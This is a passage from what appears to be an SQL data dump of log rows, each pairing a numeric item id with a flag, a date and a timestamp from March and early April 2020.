12:24:59'),(1637,80,1,'2020-03-05','2020-03-05 12:25:00'),(1638,2420,1,'2020-03-05','2020-03-05 12:25:06'),(1639,80,1,'2020-03-05','2020-03-05 12:25:06'),(1640,80,1,'2020-03-05','2020-03-05 12:25:06'),(1641,3030,1,'2020-03-05','2020-03-05 12:25:34'),(1642,108,1,'2020-03-05','2020-03-05 12:25:49'),(1643,108,1,'2020-03-05','2020-03-05 12:25:50'),(1644,108,1,'2020-03-05','2020-03-05 12:25:54'),(1645,108,1,'2020-03-05','2020-03-05 12:25:57'),(1646,108,1,'2020-03-05','2020-03-05 12:25:57'),(1647,108,1,'2020-03-05','2020-03-05 12:27:01'),(1648,68,1,'2020-03-05','2020-03-05 12:27:17'),(1649,68,1,'2020-03-05','2020-03-05 12:27:19'),(1650,68,1,'2020-03-05','2020-03-05 12:27:22'),(1651,68,1,'2020-03-05','2020-03-05 12:27:22'),(1652,68,1,'2020-03-05','2020-03-05 12:27:23'),(1653,3034,1,'2020-03-05','2020-03-05 12:29:00'),(1654,68,1,'2020-03-05','2020-03-05 12:33:43'),(1655,87,1,'2020-03-05','2020-03-05 12:59:43'),(1656,84,1,'2020-03-05','2020-03-05 14:23:39'),(1657,1870,1,'2020-03-05','2020-03-05 14:24:17'),(1658,2904,1,'2020-03-05','2020-03-05 14:25:18'),(1659,2751,1,'2020-03-05','2020-03-05 14:33:38'),(1660,2309,1,'2020-03-05','2020-03-05 14:43:37'),(1661,2609,1,'2020-03-05','2020-03-05 14:46:28'),(1662,2178,1,'2020-03-05','2020-03-05 14:59:25'),(1663,2609,1,'2020-03-05','2020-03-05 15:05:38'),(1664,80,1,'2020-03-05','2020-03-05 15:10:48'),(1665,2751,1,'2020-03-05','2020-03-05 15:15:10'),(1666,1870,1,'2020-03-05','2020-03-05 15:15:13'),(1667,84,1,'2020-03-05','2020-03-05 15:15:24'),(1668,1870,1,'2020-03-05','2020-03-05 15:15:31'),(1669,1870,1,'2020-03-05','2020-03-05 15:16:07'),(1670,84,1,'2020-03-05','2020-03-05 15:16:11'),(1671,84,1,'2020-03-05','2020-03-05 15:16:32'),(1672,2751,1,'2020-03-05','2020-03-05 15:16:38'),(1673,2609,1,'2020-03-05','2020-03-05 15:17:16'),(1674,2751,1,'2020-03-05','2020-03-05 15:17:46'),(1675,2993,1,'2020-03-05','2020-03-05 15:26:25'),(1676,468,1,'2020-03-05','2020-03-05 18:50:13'),(1677,2178,1,'2020-03-05','2020-03-05 21:17:45'),(1678,2309,1,'2020-03-05','2020-03-05 23:00:01'),(1679,2309,1,'2020-03-05','2020-03-05 23:00:04'),(1680,2309,1,'2020-03-05','2020-03-05 23:00:10'),(1681,2309,1,'2020-03-05','2020-03-05 23:00:11'),(1682,2309,1,'2020-03-05','2020-03-05 23:00:12'),(1683,87,1,'2020-03-06','2020-03-06 00:04:32'),(1684,1588,1,'2020-03-06','2020-03-06 02:02:44'),(1685,87,1,'2020-03-06','2020-03-06 09:04:20'),(1686,2751,1,'2020-03-06','2020-03-06 10:22:55'),(1687,1701,1,'2020-03-06','2020-03-06 10:23:06'),(1688,2751,1,'2020-03-06','2020-03-06 10:24:19'),(1689,1766,1,'2020-03-06','2020-03-06 10:24:34'),(1690,2751,1,'2020-03-06','2020-03-06 10:38:32'),(1691,2609,1,'2020-03-06','2020-03-06 10:38:45'),(1692,2165,1,'2020-03-06','2020-03-06 10:40:19'),(1693,2161,1,'2020-03-06','2020-03-06 10:42:06'),(1694,2154,1,'2020-03-06','2020-03-06 10:45:04'),(1695,1600,1,'2020-03-06','2020-03-06 10:49:56'),(1696,68,1,'2020-03-06','2020-03-06 10:54:14'),(1697,80,1,'2020-03-06','2020-03-06 10:54:37'),(1698,68,1,'2020-03-06','2020-03-06 10:55:56'),(1699,1600,1,'2020-03-06','2020-03-06 10:56:00'),(1700,2152,1,'2020-03-06','2020-03-06 10:58:49'),(1701,2150,1,'2020-03-06','2020-03-06 11:04:35'),(1702,2148,1,'2020-03-06','2020-03-06 11:10:10'),(1703,2063,1,'2020-03-06','2020-03-06 11:13:18'),(1704,89,1,'2020-03-06','2020-03-06 12:31:07'),(1705,1586,1,'2020-03-06','2020-03-06 12:46:12'),(1706,108,1,'2020-03-06','2020-03-06 13:24:26'),(1707,473,1,'2020-03-06','2020-03-06 14:30:52'),(1708,2150,1,'2020-03-06','2020-03-06 14:39:16'),(1709,2063,1,'2020-03-06','2020-03-06 15:02:54'),(1710,2904,1,'2020-03-06','2020-03-06 15:03:19'),(1711,3038,1,'2020-03-06','2020-03-06 15:08:03'),(1712,2751,1,'2020-03-06','2020-03-06 17:50:11'),(1713,80,1,'2020-03-06','2020-03-06 18:26:34'),(1714,1588,1,'2020-03-06','2020-03-06 18:40:22'),(1715,1606,1,'2020-03-06','2020-03-06 21:25:56'),(1716,2152,1,'2020-03-06','2020-03-06 22:46:22'),(1717,2775,1,'2020-03-06','2020-03-06 23:06:35'),(1718,2309,1,'2020-03-07','2020-03-07 01:37:06'),(1719,80,1,'2020-03-07','2020-03-07 03:57:58'),(1720,1588,1,'2020-03-07','2020-03-07 04:08:10'),(1721,2609,1,'2020-03-07','2020-03-07 08:48:43'),(1722,89,1,'2020-03-07','2020-03-07 10:18:33'),(1723,2769,1,'2020-03-07','2020-03-07 11:18:57'),(1724,80,1,'2020-03-07','2020-03-07 13:19:56'),(1725,1588,1,'2020-03-07','2020-03-07 13:50:07'),(1726,1600,1,'2020-03-07','2020-03-07 14:01:35'),(1727,1600,1,'2020-03-07','2020-03-07 16:10:48'),(1728,2309,1,'2020-03-07','2020-03-07 16:16:27'),(1729,68,1,'2020-03-07','2020-03-07 16:18:33'),(1730,2309,1,'2020-03-07','2020-03-07 16:24:36'),(1731,2991,1,'2020-03-07','2020-03-07 16:25:07'),(1732,2991,1,'2020-03-07','2020-03-07 17:12:09'),(1733,2309,1,'2020-03-07','2020-03-07 17:12:19'),(1734,335,1,'2020-03-07','2020-03-07 17:31:20'),(1735,2309,1,'2020-03-07','2020-03-07 19:45:37'),(1736,2309,1,'2020-03-07','2020-03-07 21:23:25'),(1737,1741,1,'2020-03-07','2020-03-07 23:33:24'),(1738,2309,1,'2020-03-08','2020-03-08 01:13:36'),(1739,1600,1,'2020-03-08','2020-03-08 02:04:26'),(1740,2309,1,'2020-03-08','2020-03-08 04:46:11'),(1741,2309,1,'2020-03-08','2020-03-08 04:48:49'),(1742,80,1,'2020-03-08','2020-03-08 05:55:35'),(1743,2309,1,'2020-03-08','2020-03-08 07:36:27'),(1744,2297,1,'2020-03-08','2020-03-08 09:23:23'),(1745,2297,1,'2020-03-08','2020-03-08 09:23:58'),(1746,1600,1,'2020-03-08','2020-03-08 11:05:50'),(1747,2609,1,'2020-03-08','2020-03-08 11:15:28'),(1748,2558,1,'2020-03-08','2020-03-08 11:23:59'),(1749,1705,1,'2020-03-08','2020-03-08 11:37:19'),(1750,1701,1,'2020-03-08','2020-03-08 11:38:09'),(1751,2178,1,'2020-03-08','2020-03-08 11:39:20'),(1752,2609,1,'2020-03-08','2020-03-08 11:40:18'),(1753,76,1,'2020-03-08','2020-03-08 11:40:34'),(1754,1741,1,'2020-03-08','2020-03-08 12:27:18'),(1755,2911,1,'2020-03-08','2020-03-08 15:59:23'),(1756,80,1,'2020-03-08','2020-03-08 16:57:48'),(1757,335,1,'2020-03-08','2020-03-08 17:58:20'),(1758,2751,1,'2020-03-08','2020-03-08 19:29:05'),(1759,1600,1,'2020-03-08','2020-03-08 19:39:04'),(1760,3034,1,'2020-03-08','2020-03-08 23:11:11'),(1761,1730,1,'2020-03-09','2020-03-09 01:00:45'),(1762,72,1,'2020-03-09','2020-03-09 01:32:08'),(1763,108,1,'2020-03-09','2020-03-09 04:12:54'),(1764,1600,1,'2020-03-09','2020-03-09 05:40:40'),(1765,1741,1,'2020-03-09','2020-03-09 05:54:18'),(1766,2309,1,'2020-03-09','2020-03-09 06:31:53'),(1767,2751,1,'2020-03-09','2020-03-09 06:32:17'),(1768,2309,1,'2020-03-09','2020-03-09 06:36:30'),(1769,1709,1,'2020-03-09','2020-03-09 07:02:05'),(1770,2609,1,'2020-03-09','2020-03-09 08:33:59'),(1771,1730,1,'2020-03-09','2020-03-09 09:43:11'),(1772,3034,1,'2020-03-09','2020-03-09 10:03:24'),(1773,1606,1,'2020-03-09','2020-03-09 10:43:53'),(1774,1590,1,'2020-03-09','2020-03-09 10:52:46'),(1775,72,1,'2020-03-09','2020-03-09 10:53:59'),(1776,68,1,'2020-03-09','2020-03-09 11:54:17'),(1777,87,1,'2020-03-09','2020-03-09 11:58:35'),(1778,473,1,'2020-03-09','2020-03-09 11:58:40'),(1779,482,1,'2020-03-09','2020-03-09 12:05:01'),(1780,87,1,'2020-03-09','2020-03-09 12:05:30'),(1781,91,1,'2020-03-09','2020-03-09 13:35:30'),(1782,80,1,'2020-03-09','2020-03-09 14:34:36'),(1783,2309,1,'2020-03-09','2020-03-09 20:34:47'),(1784,89,1,'2020-03-10','2020-03-10 12:00:55'),(1785,1600,1,'2020-03-10','2020-03-10 14:48:46'),(1786,1745,1,'2020-03-10','2020-03-10 14:50:55'),(1787,1600,1,'2020-03-10','2020-03-10 14:52:55'),(1788,89,1,'2020-03-10','2020-03-10 14:54:52'),(1789,91,1,'2020-03-10','2020-03-10 15:02:26'),(1790,487,1,'2020-03-10','2020-03-10 15:08:31'),(1791,91,1,'2020-03-10','2020-03-10 15:09:32'),(1792,1600,1,'2020-03-10','2020-03-10 15:22:46'),(1793,1600,1,'2020-03-10','2020-03-10 16:02:44'),(1794,482,1,'2020-03-10','2020-03-10 17:02:23'),(1795,2503,1,'2020-03-10','2020-03-10 17:02:40'),(1796,482,1,'2020-03-10','2020-03-10 17:07:32'),(1797,2503,1,'2020-03-10','2020-03-10 17:07:35'),(1798,482,1,'2020-03-10','2020-03-10 17:09:27'),(1799,2503,1,'2020-03-10','2020-03-10 17:09:41'),(1800,87,1,'2020-03-10','2020-03-10 17:10:20'),(1801,2503,1,'2020-03-10','2020-03-10 17:10:45'),(1802,482,1,'2020-03-10','2020-03-10 17:10:47'),(1803,80,1,'2020-03-10','2020-03-10 18:31:53'),(1804,1600,1,'2020-03-11','2020-03-11 04:26:32'),(1805,80,1,'2020-03-11','2020-03-11 05:19:13'),(1806,80,1,'2020-03-11','2020-03-11 05:21:10'),(1807,80,1,'2020-03-11','2020-03-11 05:23:08'),(1808,2801,1,'2020-03-11','2020-03-11 08:22:11'),(1809,108,1,'2020-03-11','2020-03-11 08:42:56'),(1810,80,1,'2020-03-11','2020-03-11 09:55:45'),(1811,3004,1,'2020-03-11','2020-03-11 10:56:31'),(1812,68,1,'2020-03-11','2020-03-11 11:36:45'),(1813,108,1,'2020-03-11','2020-03-11 11:39:40'),(1814,68,1,'2020-03-11','2020-03-11 11:49:46'),(1815,1606,1,'2020-03-11','2020-03-11 12:40:46'),(1816,1588,1,'2020-03-11','2020-03-11 14:29:27'),(1817,1588,1,'2020-03-11','2020-03-11 14:44:27'),(1818,1588,1,'2020-03-11','2020-03-11 14:44:55'),(1819,1709,1,'2020-03-11','2020-03-11 16:02:28'),(1820,74,1,'2020-03-11','2020-03-11 17:00:35'),(1821,2503,1,'2020-03-11','2020-03-11 17:01:09'),(1822,80,1,'2020-03-11','2020-03-11 17:59:36'),(1823,2964,1,'2020-03-11','2020-03-11 18:31:08'),(1824,1778,1,'2020-03-11','2020-03-11 19:14:06'),(1825,1592,1,'2020-03-11','2020-03-11 23:29:21'),(1826,2658,1,'2020-03-11','2020-03-11 23:57:56'),(1827,80,1,'2020-03-11','2020-03-11 23:58:49'),(1828,2658,1,'2020-03-11','2020-03-11 23:59:18'),(1829,1749,1,'2020-03-12','2020-03-12 00:00:14'),(1830,80,1,'2020-03-12','2020-03-12 00:00:33'),(1831,89,1,'2020-03-12','2020-03-12 00:01:31'),(1832,80,1,'2020-03-12','2020-03-12 00:01:42'),(1833,68,1,'2020-03-12','2020-03-12 00:01:45'),(1834,80,1,'2020-03-12','2020-03-12 00:02:20'),(1835,2658,1,'2020-03-12','2020-03-12 00:02:35'),(1836,80,1,'2020-03-12','2020-03-12 00:03:54'),(1837,108,1,'2020-03-12','2020-03-12 02:14:33'),(1838,1606,1,'2020-03-12','2020-03-12 04:06:02'),(1839,2609,1,'2020-03-12','2020-03-12 04:34:50'),(1840,1709,1,'2020-03-12','2020-03-12 07:03:44'),(1841,1606,1,'2020-03-12','2020-03-12 09:44:28'),(1842,1606,1,'2020-03-12','2020-03-12 09:44:34'),(1843,1606,1,'2020-03-12','2020-03-12 09:44:37'),(1844,1766,1,'2020-03-12','2020-03-12 10:41:50'),(1845,1600,1,'2020-03-12','2020-03-12 11:31:57'),(1846,1730,1,'2020-03-12','2020-03-12 11:41:50'),(1847,1588,1,'2020-03-12','2020-03-12 13:19:44'),(1848,76,1,'2020-03-12','2020-03-12 13:25:12'),(1849,2609,1,'2020-03-12','2020-03-12 13:42:50'),(1850,2309,1,'2020-03-12','2020-03-12 13:52:51'),(1851,89,1,'2020-03-12','2020-03-12 15:23:43'),(1852,3041,1,'2020-03-12','2020-03-12 15:40:46'),(1853,2309,1,'2020-03-12','2020-03-12 17:14:26'),(1854,1772,1,'2020-03-12','2020-03-12 17:45:44'),(1855,1588,1,'2020-03-12','2020-03-12 19:14:52'),(1856,3034,1,'2020-03-12','2020-03-12 20:04:55'),(1857,2609,1,'2020-03-12','2020-03-12 21:34:43'),(1858,1730,1,'2020-03-12','2020-03-12 22:44:43'),(1859,2769,1,'2020-03-12','2020-03-12 23:28:55'),(1860,2609,1,'2020-03-13','2020-03-13 00:29:11'),(1861,2309,1,'2020-03-13','2020-03-13 01:29:43'),(1862,335,1,'2020-03-13','2020-03-13 01:39:35'),(1863,2309,1,'2020-03-13','2020-03-13 02:10:07'),(1864,1741,1,'2020-03-13','2020-03-13 02:43:07'),(1865,1588,1,'2020-03-13','2020-03-13 04:40:45'),(1866,68,1,'2020-03-13','2020-03-13 05:31:04'),(1867,3034,1,'2020-03-13','2020-03-13 05:33:10'),(1868,2309,1,'2020-03-13','2020-03-13 06:36:06'),(1869,72,1,'2020-03-13','2020-03-13 06:41:47'),(1870,1730,1,'2020-03-13','2020-03-13 08:32:05'),(1871,2609,1,'2020-03-13','2020-03-13 08:52:22'),(1872,2769,1,'2020-03-13','2020-03-13 09:02:25'),(1873,1588,1,'2020-03-13','2020-03-13 10:43:59'),(1874,91,1,'2020-03-13','2020-03-13 10:44:53'),(1875,76,1,'2020-03-13','2020-03-13 10:45:39'),(1876,91,1,'2020-03-13','2020-03-13 10:45:52'),(1877,1588,1,'2020-03-13','2020-03-13 10:46:06'),(1878,2609,1,'2020-03-13','2020-03-13 10:52:21'),(1879,1588,1,'2020-03-13','2020-03-13 11:06:38'),(1880,89,1,'2020-03-13','2020-03-13 12:22:58'),(1881,89,1,'2020-03-13','2020-03-13 12:25:33'),(1882,2309,1,'2020-03-13','2020-03-13 12:43:26'),(1883,1741,1,'2020-03-13','2020-03-13 12:53:02'),(1884,2309,1,'2020-03-13','2020-03-13 13:03:04'),(1885,335,1,'2020-03-13','2020-03-13 17:48:08'),(1886,80,1,'2020-03-14','2020-03-14 09:17:49'),(1887,1703,1,'2020-03-14','2020-03-14 11:37:50'),(1888,80,1,'2020-03-14','2020-03-14 14:09:26'),(1889,1600,1,'2020-03-14','2020-03-14 16:39:06'),(1890,80,1,'2020-03-14','2020-03-14 16:39:38'),(1891,1600,1,'2020-03-14','2020-03-14 16:39:59'),(1892,1730,1,'2020-03-14','2020-03-14 17:00:44'),(1893,2309,1,'2020-03-14','2020-03-14 19:50:35'),(1894,2609,1,'2020-03-14','2020-03-14 20:03:48'),(1895,2609,1,'2020-03-14','2020-03-14 20:03:53'),(1896,2609,1,'2020-03-14','2020-03-14 20:03:54'),(1897,2801,1,'2020-03-14','2020-03-14 20:41:12'),(1898,1600,1,'2020-03-14','2020-03-14 22:18:21'),(1899,1730,1,'2020-03-14','2020-03-14 23:53:09'),(1900,1600,1,'2020-03-15','2020-03-15 09:52:01'),(1901,1600,1,'2020-03-15','2020-03-15 09:52:01'),(1902,1600,1,'2020-03-15','2020-03-15 09:52:06'),(1903,1600,1,'2020-03-15','2020-03-15 09:52:07'),(1904,1600,1,'2020-03-15','2020-03-15 09:52:08'),(1905,2775,1,'2020-03-15','2020-03-15 11:06:30'),(1906,2395,1,'2020-03-15','2020-03-15 16:31:43'),(1907,2991,1,'2020-03-15','2020-03-15 17:17:14'),(1908,335,1,'2020-03-15','2020-03-15 19:42:18'),(1909,2609,1,'2020-03-15','2020-03-15 19:52:18'),(1910,1588,1,'2020-03-15','2020-03-15 22:53:19'),(1911,1730,1,'2020-03-16','2020-03-16 02:34:43'),(1912,2152,1,'2020-03-16','2020-03-16 09:18:56'),(1913,570,1,'2020-03-16','2020-03-16 13:59:49'),(1914,2934,1,'2020-03-16','2020-03-16 13:59:57'),(1915,2934,1,'2020-03-16','2020-03-16 14:01:49'),(1916,2934,1,'2020-03-16','2020-03-16 14:01:50'),(1917,2934,1,'2020-03-16','2020-03-16 14:01:52'),(1918,2934,1,'2020-03-16','2020-03-16 14:01:54'),(1919,1588,1,'2020-03-16','2020-03-16 16:41:14'),(1920,68,1,'2020-03-16','2020-03-16 16:41:46'),(1921,76,1,'2020-03-16','2020-03-16 16:41:59'),(1922,468,1,'2020-03-16','2020-03-16 16:43:20'),(1923,89,1,'2020-03-17','2020-03-17 19:14:55'),(1924,80,1,'2020-03-17','2020-03-17 19:17:04'),(1925,3034,1,'2020-03-18','2020-03-18 09:46:15'),(1926,1588,1,'2020-03-18','2020-03-18 16:15:17'),(1927,1588,1,'2020-03-18','2020-03-18 16:16:02'),(1928,570,1,'2020-03-18','2020-03-18 17:33:32'),(1929,91,1,'2020-03-18','2020-03-18 22:33:50'),(1930,3030,1,'2020-03-19','2020-03-19 03:01:37'),(1931,2457,1,'2020-03-19','2020-03-19 03:21:28'),(1932,2609,1,'2020-03-19','2020-03-19 04:32:05'),(1933,2801,1,'2020-03-19','2020-03-19 09:24:35'),(1934,89,1,'2020-03-19','2020-03-19 10:16:37'),(1935,3045,1,'2020-03-19','2020-03-19 10:41:19'),(1936,84,1,'2020-03-19','2020-03-19 11:44:30'),(1937,87,1,'2020-03-19','2020-03-19 11:44:42'),(1938,481,1,'2020-03-19','2020-03-19 11:44:52'),(1939,87,1,'2020-03-19','2020-03-19 11:45:03'),(1940,91,1,'2020-03-19','2020-03-19 11:45:15'),(1941,91,1,'2020-03-19','2020-03-19 11:45:17'),(1942,89,1,'2020-03-19','2020-03-19 11:45:40'),(1943,89,1,'2020-03-19','2020-03-19 11:45:59'),(1944,89,1,'2020-03-19','2020-03-19 11:46:00'),(1945,1614,1,'2020-03-19','2020-03-19 11:46:00'),(1946,89,1,'2020-03-19','2020-03-19 11:46:00'),(1947,89,1,'2020-03-19','2020-03-19 11:46:05'),(1948,1614,1,'2020-03-19','2020-03-19 11:46:10'),(1949,1614,1,'2020-03-19','2020-03-19 11:46:12'),(1950,1614,1,'2020-03-19','2020-03-19 11:46:13'),(1951,89,1,'2020-03-19','2020-03-19 11:46:18'),(1952,3045,1,'2020-03-19','2020-03-19 11:46:26'),(1953,1614,1,'2020-03-19','2020-03-19 11:46:29'),(1954,1614,1,'2020-03-19','2020-03-19 11:46:34'),(1955,1612,1,'2020-03-19','2020-03-19 11:49:32'),(1956,2748,1,'2020-03-19','2020-03-19 11:49:46'),(1957,1614,1,'2020-03-19','2020-03-19 11:54:45'),(1958,1614,1,'2020-03-19','2020-03-19 11:54:45'),(1959,3030,1,'2020-03-19','2020-03-19 12:15:40'),(1960,1588,1,'2020-03-19','2020-03-19 12:35:19'),(1961,1598,1,'2020-03-19','2020-03-19 12:58:34'),(1962,1598,1,'2020-03-19','2020-03-19 12:58:34'),(1963,1598,1,'2020-03-19','2020-03-19 12:58:37'),(1964,1598,1,'2020-03-19','2020-03-19 12:58:41'),(1965,1598,1,'2020-03-19','2020-03-19 12:58:41'),(1966,2609,1,'2020-03-19','2020-03-19 14:26:00'),(1967,2813,1,'2020-03-19','2020-03-19 14:38:43'),(1968,2457,1,'2020-03-19','2020-03-19 14:39:34'),(1969,91,1,'2020-03-19','2020-03-19 14:40:36'),(1970,2457,1,'2020-03-19','2020-03-19 14:42:55'),(1971,89,1,'2020-03-19','2020-03-19 14:43:24'),(1972,2457,1,'2020-03-19','2020-03-19 14:44:00'),(1973,2457,1,'2020-03-19','2020-03-19 14:44:40'),(1974,1730,1,'2020-03-19','2020-03-19 14:46:34'),(1975,89,1,'2020-03-19','2020-03-19 15:37:56'),(1976,80,1,'2020-03-19','2020-03-19 17:17:31'),(1977,2934,1,'2020-03-19','2020-03-19 19:08:24'),(1978,2769,1,'2020-03-19','2020-03-19 19:28:15'),(1979,2801,1,'2020-03-19','2020-03-19 19:48:31'),(1980,3034,1,'2020-03-19','2020-03-19 20:28:44'),(1981,2609,1,'2020-03-19','2020-03-19 23:40:45'),(1982,1730,1,'2020-03-20','2020-03-20 01:11:21'),(1983,80,1,'2020-03-20','2020-03-20 02:11:03'),(1984,108,1,'2020-03-20','2020-03-20 19:48:30'),(1985,1606,1,'2020-03-20','2020-03-20 21:39:12'),(1986,1582,1,'2020-03-21','2020-03-21 01:00:26'),(1987,87,1,'2020-03-21','2020-03-21 01:08:06'),(1988,468,1,'2020-03-21','2020-03-21 01:09:54'),(1989,1709,1,'2020-03-21','2020-03-21 08:32:49'),(1990,108,1,'2020-03-21','2020-03-21 10:50:05'),(1991,72,1,'2020-03-21','2020-03-21 12:59:18'),(1992,108,1,'2020-03-21','2020-03-21 12:59:29'),(1993,1588,1,'2020-03-21','2020-03-21 13:07:42'),(1994,108,1,'2020-03-21','2020-03-21 13:08:17'),(1995,108,1,'2020-03-21','2020-03-21 13:13:21'),(1996,1606,1,'2020-03-21','2020-03-21 13:53:17'),(1997,2989,1,'2020-03-22','2020-03-22 09:45:39'),(1998,80,1,'2020-03-22','2020-03-22 12:15:28'),(1999,1737,1,'2020-03-22','2020-03-22 14:03:24'),(2000,2989,1,'2020-03-22','2020-03-22 16:23:56'),(2001,1600,1,'2020-03-22','2020-03-22 16:51:06'),(2002,2609,1,'2020-03-23','2020-03-23 02:44:38'),(2003,1600,1,'2020-03-23','2020-03-23 06:25:43'),(2004,1730,1,'2020-03-23','2020-03-23 11:07:35'),(2005,2609,1,'2020-03-23','2020-03-23 12:07:36'),(2006,2751,1,'2020-03-23','2020-03-23 12:30:43'),(2007,1600,1,'2020-03-23','2020-03-23 14:38:36'),(2008,2801,1,'2020-03-23','2020-03-23 14:48:56'),(2009,3034,1,'2020-03-23','2020-03-23 16:12:36'),(2010,80,1,'2020-03-23','2020-03-23 17:08:12'),(2011,1600,1,'2020-03-23','2020-03-23 23:41:49'),(2012,1600,1,'2020-03-23','2020-03-23 23:43:09'),(2013,1604,1,'2020-03-24','2020-03-24 00:19:11'),(2014,1600,1,'2020-03-24','2020-03-24 11:14:15'),(2015,80,1,'2020-03-24','2020-03-24 15:06:12'),(2016,108,1,'2020-03-24','2020-03-24 23:48:46'),(2017,1606,1,'2020-03-25','2020-03-25 03:31:07'),(2018,1588,1,'2020-03-25','2020-03-25 03:43:10'),(2019,1600,1,'2020-03-25','2020-03-25 05:42:47'),(2020,1588,1,'2020-03-25','2020-03-25 09:48:57'),(2021,2751,1,'2020-03-25','2020-03-25 11:27:39'),(2022,2751,1,'2020-03-25','2020-03-25 11:39:03'),(2023,84,1,'2020-03-25','2020-03-25 11:41:18'),(2024,1877,1,'2020-03-25','2020-03-25 11:42:26'),(2025,2617,1,'2020-03-25','2020-03-25 11:49:31'),(2026,1600,1,'2020-03-25','2020-03-25 13:43:24'),(2027,2751,1,'2020-03-25','2020-03-25 16:08:00'),(2028,80,1,'2020-03-25','2020-03-25 17:22:33'),(2029,108,1,'2020-03-25','2020-03-25 21:50:37'),(2030,80,1,'2020-03-25','2020-03-25 21:51:00'),(2031,1709,1,'2020-03-26','2020-03-26 02:43:16'),(2032,2309,1,'2020-03-26','2020-03-26 07:04:14'),(2033,2609,1,'2020-03-26','2020-03-26 10:01:02'),(2034,80,1,'2020-03-26','2020-03-26 11:50:12'),(2035,2751,1,'2020-03-26','2020-03-26 12:27:51'),(2036,1600,1,'2020-03-26','2020-03-26 12:40:34'),(2037,3034,1,'2020-03-26','2020-03-26 15:02:20'),(2038,91,1,'2020-03-26','2020-03-26 15:26:29'),(2039,2309,1,'2020-03-26','2020-03-26 15:51:40'),(2040,1600,1,'2020-03-26','2020-03-26 23:03:01'),(2041,1730,1,'2020-03-27','2020-03-27 00:03:26'),(2042,2801,1,'2020-03-27','2020-03-27 00:23:44'),(2043,1709,1,'2020-03-27','2020-03-27 00:24:24'),(2044,1703,1,'2020-03-27','2020-03-27 00:57:43'),(2045,2309,1,'2020-03-27','2020-03-27 01:46:12'),(2046,2609,1,'2020-03-27','2020-03-27 03:04:08'),(2047,335,1,'2020-03-27','2020-03-27 04:34:09'),(2048,2751,1,'2020-03-27','2020-03-27 09:36:12'),(2049,473,1,'2020-03-27','2020-03-27 09:44:26'),(2050,1614,1,'2020-03-27','2020-03-27 09:55:06'),(2051,1588,1,'2020-03-27','2020-03-27 09:56:27'),(2052,1588,1,'2020-03-27','2020-03-27 09:59:21'),(2053,84,1,'2020-03-27','2020-03-27 10:00:00'),(2054,1870,1,'2020-03-27','2020-03-27 10:02:27'),(2055,1720,1,'2020-03-27','2020-03-27 10:03:48'),(2056,1713,1,'2020-03-27','2020-03-27 10:05:04'),(2057,1588,1,'2020-03-27','2020-03-27 10:09:55'),(2058,1588,1,'2020-03-27','2020-03-27 10:13:16'),(2059,1588,1,'2020-03-27','2020-03-27 10:15:31'),(2060,1614,1,'2020-03-27','2020-03-27 10:38:09'),(2061,89,1,'2020-03-27','2020-03-27 10:38:43'),(2062,68,1,'2020-03-27','2020-03-27 10:43:28'),(2063,89,1,'2020-03-27','2020-03-27 10:44:23'),(2064,2769,1,'2020-03-27','2020-03-27 10:44:37'),(2065,89,1,'2020-03-27','2020-03-27 10:44:44'),(2066,1614,1,'2020-03-27','2020-03-27 10:46:21'),(2067,68,1,'2020-03-27','2020-03-27 10:52:57'),(2068,1600,1,'2020-03-27','2020-03-27 10:56:40'),(2069,1747,1,'2020-03-27','2020-03-27 10:58:09'),(2070,72,1,'2020-03-27','2020-03-27 10:58:49'),(2071,1614,1,'2020-03-27','2020-03-27 11:01:09'),(2072,68,1,'2020-03-27','2020-03-27 11:04:17'),(2073,89,1,'2020-03-27','2020-03-27 11:45:06'),(2074,1614,1,'2020-03-27','2020-03-27 11:45:16'),(2075,474,1,'2020-03-27','2020-03-27 15:32:58'),(2076,3034,1,'2020-03-27','2020-03-27 15:37:17'),(2077,2309,1,'2020-03-27','2020-03-27 15:58:47'),(2078,2775,1,'2020-03-27','2020-03-27 16:06:40'),(2079,2801,1,'2020-03-27','2020-03-27 18:19:54'),(2080,1600,1,'2020-03-27','2020-03-27 21:49:43'),(2081,1588,1,'2020-03-28','2020-03-28 07:34:13'),(2082,2309,1,'2020-03-28','2020-03-28 08:02:51'),(2083,1586,1,'2020-03-28','2020-03-28 09:28:41'),(2084,1600,1,'2020-03-28','2020-03-28 09:43:19'),(2085,2801,1,'2020-03-28','2020-03-28 11:29:20'),(2086,2801,1,'2020-03-28','2020-03-28 11:31:32'),(2087,72,1,'2020-03-28','2020-03-28 11:44:52'),(2088,72,1,'2020-03-28','2020-03-28 11:50:17'),(2089,72,1,'2020-03-28','2020-03-28 11:54:31'),(2090,1588,1,'2020-03-28','2020-03-28 17:37:29'),(2091,1608,1,'2020-03-28','2020-03-28 19:01:51'),(2092,80,1,'2020-03-28','2020-03-28 19:04:46'),(2093,80,1,'2020-03-28','2020-03-28 19:06:15'),(2094,76,1,'2020-03-28','2020-03-28 19:06:23'),(2095,2801,1,'2020-03-29','2020-03-29 00:59:53'),(2096,2801,1,'2020-03-29','2020-03-29 01:05:23'),(2097,1600,1,'2020-03-29','2020-03-29 02:02:06'),(2098,1588,1,'2020-03-29','2020-03-29 03:12:45'),(2099,1588,1,'2020-03-29','2020-03-29 03:13:29'),(2100,2309,1,'2020-03-29','2020-03-29 03:29:04'),(2101,91,1,'2020-03-29','2020-03-29 08:42:00'),(2102,2813,1,'2020-03-29','2020-03-29 10:21:43'),(2103,1600,1,'2020-03-29','2020-03-29 13:25:03'),(2104,1608,1,'2020-03-29','2020-03-29 14:31:24'),(2105,2309,1,'2020-03-29','2020-03-29 17:03:50'),(2106,2751,1,'2020-03-30','2020-03-30 11:16:48'),(2107,2309,1,'2020-03-30','2020-03-30 11:25:56'),(2108,2658,1,'2020-03-31','2020-03-31 01:50:36'),(2109,80,1,'2020-03-31','2020-03-31 02:12:25'),(2110,1600,1,'2020-03-31','2020-03-31 08:46:39'),(2111,2813,1,'2020-03-31','2020-03-31 09:35:09'),(2112,1594,1,'2020-03-31','2020-03-31 09:53:45'),(2113,1588,1,'2020-03-31','2020-03-31 12:17:58'),(2114,2309,1,'2020-03-31','2020-03-31 13:27:25'),(2115,1588,1,'2020-03-31','2020-03-31 14:57:58'),(2116,89,1,'2020-03-31','2020-03-31 17:36:12'),(2117,1614,1,'2020-03-31','2020-03-31 17:36:34'),(2118,91,1,'2020-03-31','2020-03-31 17:37:31'),(2119,1600,1,'2020-03-31','2020-03-31 18:59:18'),(2120,1701,1,'2020-03-31','2020-03-31 19:51:57'),(2121,2309,1,'2020-03-31','2020-03-31 22:20:09'),(2122,108,1,'2020-03-31','2020-03-31 22:59:44'),(2123,108,1,'2020-03-31','2020-03-31 23:00:39'),(2124,1588,1,'2020-04-01','2020-04-01 01:42:34'),(2125,2801,1,'2020-04-01','2020-04-01 